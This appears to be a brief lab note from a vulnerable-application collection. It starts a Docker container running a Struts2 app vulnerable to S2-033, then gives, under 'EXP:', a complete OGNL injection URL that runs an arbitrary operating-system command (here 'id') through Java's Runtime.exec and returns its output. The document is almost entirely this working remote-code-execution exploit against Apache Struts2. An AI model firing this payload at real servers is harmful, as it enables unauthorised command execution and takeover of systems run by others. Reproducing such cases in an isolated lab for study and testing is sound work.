docker pull medicean/vulapps:s_struts2_s2-033
docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-033
EXP:
http://127.0.0.1:8080/orders/4/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=id
参考:http://vulapps.evalbug.com/s_struts2_s2-033/